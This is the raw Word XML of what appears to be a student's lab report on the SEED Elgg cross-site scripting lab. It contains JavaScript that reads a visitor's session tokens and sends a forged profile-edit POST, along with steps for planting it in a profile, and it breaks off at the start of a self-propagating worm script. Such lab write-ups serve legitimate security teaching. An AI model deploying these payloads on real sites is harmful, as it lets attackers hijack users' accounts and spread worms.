            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="1155CC"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>elgg.session.user.name</w:t>
        </w:r>
      </w:hyperlink>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var guid="&amp;guid="+elgg.session.user.guid;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    var ts="&amp;__elgg_ts="+elgg.security.token.__elgg_ts;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    var token="&amp;__elgg_token="+elgg.security.token.__elgg_token;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    //Construct the content of your url.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    var content=token + ts + "&amp;name=" + userName + "&amp;description=&lt;p&gt;Greetings from Samy!&lt;/p&gt;" + guid; //FILL IN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    var samyGuid=47; //FILL IN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    var sendurl = "</w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="1155CC"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://www.xsslabelgg.com/action/profile/edit</w:t>
        </w:r>
      </w:hyperlink>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if(elgg.session.user.guid!=samyGuid)</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//Create and send Ajax request to modify profile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>        var Ajax=null;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>        Ajax=new XMLHttpRequest();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>        Ajax.open("POST",sendurl,true);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>        Ajax.setRequestHeader("Host","</w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="1155CC"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>www.xsslabelgg.com</w:t>
        </w:r>
      </w:hyperlink>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Ajax.setRequestHeader("Content-Type",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>        "application/x-www-form-urlencoded");</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>        Ajax.send(content);</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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2418C0" w14:textId="3265E596" w:rsidR="006666AD" w:rsidRDefault="006666AD"/>
    <w:p w14:paraId="0A257CDE" w14:textId="5B340E2A" w:rsidR="00F76A92" w:rsidRDefault="00F76A92"/>
    <w:p w14:paraId="77103FF7" w14:textId="4572D759" w:rsidR="00F76A92" w:rsidRDefault="00F76A92"/>
    <w:p w14:paraId="61BC4B78" w14:textId="0FA82824" w:rsidR="00F76A92" w:rsidRDefault="00F76A92"/>
    <w:p w14:paraId="4118B5FC" w14:textId="6C0A5445" w:rsidR="00F76A92" w:rsidRDefault="00F76A92"/>
    <w:p w14:paraId="634FBF18" w14:textId="0562E872" w:rsidR="00F76A92" w:rsidRDefault="00F76A92"/>
    <w:p w14:paraId="3E7C0008" w14:textId="361A0999" w:rsidR="00F76A92" w:rsidRDefault="00F76A92"/>
    <w:p w14:paraId="1FEF127E" w14:textId="31A5326F" w:rsidR="00F76A92" w:rsidRDefault="00F76A92"/>
    <w:p w14:paraId="298C8AD1" w14:textId="0FB63A23" w:rsidR="00F76A92" w:rsidRDefault="00F76A92"/>
    <w:p w14:paraId="5CE10BC2" w14:textId="408CF069" w:rsidR="00F76A92" w:rsidRDefault="00F76A92"/>
    <w:p w14:paraId="79EFCB4D" w14:textId="7F573D08" w:rsidR="00F76A92" w:rsidRDefault="00F76A92"/>
    <w:p w14:paraId="50CD6A0B" w14:textId="736A17DC" w:rsidR="00F76A92" w:rsidRDefault="00F76A92"/>
    <w:p w14:paraId="48225A64" w14:textId="68E7455C" w:rsidR="00F76A92" w:rsidRDefault="00F76A92">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Q7.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5CC652" w14:textId="5133203D" w:rsidR="00574316" w:rsidRDefault="00574316">
      <w:r>
        <w:t>Step 1: Log in as Samy. Edit Samy’s profile to figure out Samy’s guid</w:t>
      </w:r>
      <w:r w:rsidR="00976FBF">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DB3972">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the request URL </w:t>
      </w:r>
      <w:r w:rsidR="00976FBF">
        <w:t xml:space="preserve">and the </w:t>
      </w:r>
      <w:r w:rsidR="009B3D93">
        <w:t>content</w:t>
      </w:r>
      <w:r w:rsidR="00976FBF">
        <w:t xml:space="preserve"> of the POST request </w:t>
      </w:r>
      <w:r w:rsidR="009B3D93">
        <w:t>body</w:t>
      </w:r>
      <w:r w:rsidR="0002423A">
        <w:t xml:space="preserve"> to use</w:t>
      </w:r>
      <w:r w:rsidR="00F52C16">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C6063A" w14:textId="45878D6B" w:rsidR="006666AD" w:rsidRDefault="00574316">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EE1643A" wp14:editId="0B73964A">
            <wp:extent cx="5598543" cy="340996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9769" cy="3410714"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE2E942" w14:textId="5E55AD37" w:rsidR="00574316" w:rsidRDefault="00574316">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64E16D7D" wp14:editId="5304CCF0">
            <wp:extent cx="5607170" cy="3721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304" cy="3724747"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E2F9E3" w14:textId="4715FAD9" w:rsidR="0002423A" w:rsidRDefault="0002423A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31452C40" wp14:editId="34D49C5A">
            <wp:extent cx="5943600" cy="2211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11070"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF3976F" w14:textId="0B0552E5" w:rsidR="00F52C16" w:rsidRDefault="00F52C16"/>
    <w:p w14:paraId="6649DF4D" w14:textId="038AE97C" w:rsidR="00F52C16" w:rsidRDefault="00F52C16">
      <w:r>
        <w:t>Step 2: Embed the JavaScript code into Samy’s profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B7496E" w14:textId="596EED0A" w:rsidR="00F52C16" w:rsidRDefault="00F52C16">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A02E5FF" wp14:editId="69FC41AD">
            <wp:extent cx="5943600" cy="3430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pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="140BD9E2" w14:textId="4702C0C6" w:rsidR="009B3324" w:rsidRDefault="009B3324"/>
    <w:p w14:paraId="5ED31F12" w14:textId="77777777" w:rsidR="00461D39" w:rsidRDefault="00461D39"/>
    <w:p w14:paraId="3409AD10" w14:textId="77777777" w:rsidR="00461D39" w:rsidRDefault="00461D39"/>
    <w:p w14:paraId="44A6A3FF" w14:textId="77777777" w:rsidR="00461D39" w:rsidRDefault="00461D39"/>
    <w:p w14:paraId="1D104FC9" w14:textId="77777777" w:rsidR="00461D39" w:rsidRDefault="00461D39"/>
    <w:p w14:paraId="241D523D" w14:textId="77777777" w:rsidR="00461D39" w:rsidRDefault="00461D39"/>
    <w:p w14:paraId="4FAA5833" w14:textId="15D193BC" w:rsidR="00976FBF" w:rsidRDefault="00976FBF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Step 3: Log in as Boby to view Samy’s profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B26E085" w14:textId="0F08F975" w:rsidR="00976FBF" w:rsidRDefault="00976FBF">
      <w:r>
        <w:t>Boby’s profile before visiting Samy’s profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E960A1" w14:textId="6000CFFE" w:rsidR="00976FBF" w:rsidRDefault="00976FBF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DEB786C" wp14:editId="239D67A8">
            <wp:extent cx="5943600" cy="3182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1A383C96" w14:textId="65DEF538" w:rsidR="00976FBF" w:rsidRDefault="00976FBF"/>
    <w:p w14:paraId="35726373" w14:textId="09D58ACF" w:rsidR="00976FBF" w:rsidRDefault="00976FBF">
      <w:r>
        <w:t>Visit Samy’s profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603ACB9D" w14:textId="4B257C5D" w:rsidR="00976FBF" w:rsidRDefault="00976FBF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E3357C5" wp14:editId="76A07B09">
            <wp:extent cx="5943600" cy="3037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37205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F32B995" w14:textId="77777777" w:rsidR="00327174" w:rsidRDefault="00327174"/>
    <w:p w14:paraId="5B375B71" w14:textId="77777777" w:rsidR="00327174" w:rsidRDefault="00327174"/>
    <w:p w14:paraId="7820E0C9" w14:textId="74B4E80E" w:rsidR="00976FBF" w:rsidRDefault="00976FBF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Boby’s profile </w:t>
      </w:r>
      <w:r>
        <w:t>after</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> visiting Samy’s profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722D34CA" w14:textId="2423B181" w:rsidR="00976FBF" w:rsidRDefault="00976FBF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10D4343E" wp14:editId="05EC0917">
            <wp:extent cx="5943600" cy="3131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2494D101" w14:textId="4E8C6F08" w:rsidR="00976FBF" w:rsidRDefault="00976FBF"/>
    <w:p w14:paraId="7C8C6DC1" w14:textId="4E7B1F60" w:rsidR="00D72595" w:rsidRDefault="00D72595">
      <w:r>
        <w:t>Evidence that the attack was successful:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646F851B" w14:textId="515AF4D2" w:rsidR="00D72595" w:rsidRDefault="00D72595">
      <w:r>
        <w:t>Boby’s “About me” changes from “I am Boby!” to “Greetings from Samy!” after Boby visits Samy’s profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296EFBAD" w14:textId="21B9D818" w:rsidR="008B550F" w:rsidRDefault="008B550F"/>
    <w:p w14:paraId="71A3C5B1" w14:textId="32E40140" w:rsidR="008B550F" w:rsidRDefault="008B550F"/>
    <w:p w14:paraId="7010C818" w14:textId="4ED9245F" w:rsidR="008B550F" w:rsidRDefault="008B550F"/>
    <w:p w14:paraId="7B5540D3" w14:textId="10A4E993" w:rsidR="008B550F" w:rsidRDefault="008B550F"/>
    <w:p w14:paraId="21A156E4" w14:textId="458F1BEE" w:rsidR="008B550F" w:rsidRDefault="008B550F"/>
    <w:p w14:paraId="1E2F4EA8" w14:textId="17E94AAA" w:rsidR="008B550F" w:rsidRDefault="008B550F"/>
    <w:p w14:paraId="6BE2281B" w14:textId="5E299788" w:rsidR="008B550F" w:rsidRDefault="008B550F"/>
    <w:p w14:paraId="7CA722D4" w14:textId="32F02AD5" w:rsidR="008B550F" w:rsidRDefault="008B550F"/>
    <w:p w14:paraId="42A8051F" w14:textId="42D944A3" w:rsidR="008B550F" w:rsidRDefault="008B550F"/>
    <w:p w14:paraId="242AFAE8" w14:textId="1FE85A05" w:rsidR="008B550F" w:rsidRDefault="008B550F"/>
    <w:p w14:paraId="2FD22D16" w14:textId="2D187278" w:rsidR="008B550F" w:rsidRDefault="008B550F"/>
    <w:p w14:paraId="1DEC3864" w14:textId="0A3C2328" w:rsidR="008B550F" w:rsidRDefault="008B550F"/>
    <w:p w14:paraId="401D6C4E" w14:textId="43D0BDB5" w:rsidR="008B550F" w:rsidRDefault="008B550F"/>
    <w:p w14:paraId="3A0AACA2" w14:textId="49D50B6E" w:rsidR="008B550F" w:rsidRDefault="008B550F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Q7.3</w:t>
      </w:r>
      <w:r w:rsidR="00301763">
        <w:t xml:space="preserve"> We need Line 12 because otherwise Samy’s profile would also be changed once Samy submit</w:t>
      </w:r>
      <w:r w:rsidR="00C55D04">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00301763">
        <w:t xml:space="preserve"> the request for changing </w:t>
      </w:r>
      <w:r w:rsidR="00C55D04">
        <w:t xml:space="preserve">his </w:t>
      </w:r>
      <w:r w:rsidR="00301763">
        <w:t>profile. As a result, the message “Greetings from Samy!” would overwrite Samy’s “About me” section over the malicious JavaScript code we just embedded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D244D9C" w14:textId="4041EBC6" w:rsidR="00446C3E" w:rsidRDefault="00446C3E"/>
    <w:p w14:paraId="3BFED170" w14:textId="2B77FE87" w:rsidR="007B34EA" w:rsidRDefault="007B34EA">
      <w:r>
        <w:t>Step 1: Comment out line 12.</w:t>
      </w:r>
      <w:r w:rsidR="00AE486D">
        <w:t xml:space="preserve"> Then change Samy’s profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB65E3D" w14:textId="579CBDBF" w:rsidR="007B34EA" w:rsidRDefault="007B34EA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BEAB53F" wp14:editId="2EB00D53">
            <wp:extent cx="5464454" cy="3153153"/>
            <wp:effectExtent l="0" t="0" r="317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713" cy="3157342"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4006EF47" w14:textId="513CDD7B" w:rsidR="007B34EA" w:rsidRDefault="007B34EA">
      <w:r>
        <w:t xml:space="preserve">Step 2: </w:t>
      </w:r>
      <w:r w:rsidR="00107B49">
        <w:t>Samy’s “About me” changes to “Greetings from Samy!” instead of the JavaScript code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160D42A0" w14:textId="1AADFA7F" w:rsidR="00AE486D" w:rsidRDefault="00AE486D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="378FADFF" wp14:editId="00AE85C5">
            <wp:extent cx="5493715" cy="3218166"/>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5563" cy="3230964"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6FAB23" w14:textId="6136834E" w:rsidR="00277D57" w:rsidRDefault="00277D57">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Explanation: If we don’t include the “guid != samyGuid” check, then Samy himself would also be a victim of </w:t>
      </w:r>
      <w:r w:rsidR="00FA0EB9">
        <w:t xml:space="preserve">his </w:t>
      </w:r>
      <w:r w:rsidR="000A7FCE">
        <w:t xml:space="preserve">own </w:t>
      </w:r>
      <w:r>
        <w:t>malicious JavaScript code. Therefore, Samy’s own profile would be modified once Samy submits the request for changing his profile</w:t>
      </w:r>
      <w:r w:rsidR="00307AED">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00307AED">
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>nd effectively t</w:t>
      </w:r>
      <w:r>
        <w:t>he message “Greetings from Samy!” would overwrite Samy’s “About me” section over the JavaScript code we just embedded</w:t>
      </w:r>
      <w:r w:rsidR="00FA0EB9">
        <w:t>. This ruins our effort for injecting the JavaScript code and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mak</w:t>
      </w:r>
      <w:r w:rsidR="008C4B99">
        <w:t>es</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FA0EB9">
        <w:t>further</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> attack</w:t>
      </w:r>
      <w:r w:rsidR="00FA0EB9">
        <w:t>s impossible.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03583436" w14:textId="69D7BA8E" w:rsidR="00B3003A" w:rsidRDefault="00B3003A"/>
    <w:p w14:paraId="141CC99B" w14:textId="2F6F07FE" w:rsidR="00B3003A" w:rsidRDefault="00B3003A"/>
    <w:p w14:paraId="51925617" w14:textId="75FDA0BF" w:rsidR="00B3003A" w:rsidRDefault="00B3003A"/>
    <w:p w14:paraId="1E0CAAE9" w14:textId="6705794B" w:rsidR="00B3003A" w:rsidRDefault="00B3003A"/>
    <w:p w14:paraId="580B2B7B" w14:textId="3F8FE37A" w:rsidR="00B3003A" w:rsidRDefault="00B3003A"/>
    <w:p w14:paraId="0E169857" w14:textId="13DEECFE" w:rsidR="00B3003A" w:rsidRDefault="00B3003A"/>
    <w:p w14:paraId="6A368644" w14:textId="48C9CF2C" w:rsidR="00B3003A" w:rsidRDefault="00B3003A"/>
    <w:p w14:paraId="011D971E" w14:textId="673AFBFD" w:rsidR="00B3003A" w:rsidRDefault="00B3003A"/>
    <w:p w14:paraId="5CE20B8D" w14:textId="66E20214" w:rsidR="00B3003A" w:rsidRDefault="00B3003A"/>
    <w:p w14:paraId="07769BA6" w14:textId="6C3DF5BC" w:rsidR="00B3003A" w:rsidRDefault="00B3003A"/>
    <w:p w14:paraId="2009239C" w14:textId="19A7EA52" w:rsidR="00B3003A" w:rsidRDefault="00B3003A"/>
    <w:p w14:paraId="59D50CAD" w14:textId="5D542E39" w:rsidR="00B3003A" w:rsidRDefault="00B3003A"/>
    <w:p w14:paraId="017E37B3" w14:textId="622B6C39" w:rsidR="00B3003A" w:rsidRDefault="00B3003A"/>
    <w:p w14:paraId="36E3A844" w14:textId="56BB0AAC" w:rsidR="00B3003A" w:rsidRDefault="00B3003A"/>
    <w:p w14:paraId="60955DBF" w14:textId="5D3A4C7D" w:rsidR="00B3003A" w:rsidRDefault="00B3003A"/>
    <w:p w14:paraId="20954B07" w14:textId="1A6C0970" w:rsidR="00B3003A" w:rsidRDefault="00B3003A"/>
    <w:p w14:paraId="3DB2C283" w14:textId="0DDCF79B" w:rsidR="00B3003A" w:rsidRDefault="00B3003A"/>
    <w:p w14:paraId="7113AAE1" w14:textId="1A8F7513" w:rsidR="00B3003A" w:rsidRDefault="00B3003A"/>
    <w:p w14:paraId="0C8B0CC8" w14:textId="4D7614F2" w:rsidR="00B3003A" w:rsidRDefault="00B3003A"/>
    <w:p w14:paraId="460E5BE9" w14:textId="2FE8C4E0" w:rsidR="00B3003A" w:rsidRDefault="00B3003A"/>
    <w:p w14:paraId="0FD586F1" w14:textId="0DA67C8F" w:rsidR="00B3003A" w:rsidRDefault="00B3003A"/>
    <w:p w14:paraId="4705257C" w14:textId="2B7BCDFB" w:rsidR="00B3003A" w:rsidRDefault="00B3003A"/>
    <w:p w14:paraId="4799D80C" w14:textId="7402113C" w:rsidR="00B3003A" w:rsidRDefault="00B3003A"/>
    <w:p w14:paraId="0E5C1293" w14:textId="7D415AE7" w:rsidR="00B3003A" w:rsidRDefault="00B3003A"/>
    <w:p w14:paraId="4F495763" w14:textId="4BAA5A63" w:rsidR="00B3003A" w:rsidRDefault="00B3003A"/>
    <w:p w14:paraId="615A779B" w14:textId="40067C1C" w:rsidR="00B3003A" w:rsidRDefault="00B3003A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Q8.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D41D7B" w14:textId="568AF8A0" w:rsidR="006575E1" w:rsidRDefault="006575E1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>&lt;script id="worm" type="text/javascript"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>window.onload = function(){</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    //JavaScript code to access user name, user guid, Time Stamp __elgg_ts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    //and Security Token __elgg_token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
